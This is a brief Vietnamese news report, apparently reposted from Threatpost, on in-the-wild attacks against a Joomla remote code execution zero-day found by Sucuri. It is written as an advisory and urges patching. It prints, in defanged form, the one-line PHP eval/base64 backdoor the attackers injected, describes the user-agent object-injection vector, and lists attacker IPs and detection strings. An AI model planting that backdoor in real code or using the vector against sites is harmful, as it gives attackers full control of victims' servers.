Tấn công lợi dụng lỗ hổng Zero-day trên Joomla

Các nhà nghiên cứu bảo mật Sucuri đã phát hiện ra các cuộc tấn công lợi dụng lỗ hổng Zero-day thực thi mã từ xa trên hệ quản trị nội dung Joomla. Quản trị viên cần cập nhật phiên bản Joomla càng sớm càng tốt.

Bản vá được đăng tải vào thứ Hai, nhưng trước đó vài ngày, Sucuri đã phát hiện ra các cuộc tấn công khai thác lỗ hổng trong thực tế. Lỗ hổng liên quan đến tiêm nhiễm đối tượng thông qua HTTP user agent dẫn tới toàn quyền thực thi lệnh từ xa. Lỗ hổng ảnh hưởng đến tất cả các phiên bản Joomla từ 1.5 đến 3.4. Các phiên bản cũ từ 2.5 trở xuống bị ngừng hỗ trợ cũng được tung bản vá.

Khai thác sử dụng điểm yếu bảo mật để chèn đoạn code dưới đây vào cơ sở dữ liệu:

eval [(] base64_decode [(] [$]_POST[111])) ;

Đây là backdoor để thực thi bất kì PHP code nào thông qua lệnh POST với biến 111. Các cuộc tấn công được Sucuri phát hiện bắt nguồn từ địa chỉ IP 74[.]3[.]170[.]33, 146[.]0[.]72[.]83 và 194[.]28[.]174[.]106, tấn công hàng trang trang sử dụng Joomla.

Sucuri khuyến cáo sử dụng bộ lọc log với địa chỉ IP trên hoặc tìm kiếm “JDatabaseDriverMysqli” hoặc“O:” trong User Agent. Nếu tìm thấy, bạn cần xem xét xử lý sự cố trên website của mình.

Threatpost

Bình luận

Từ khóa: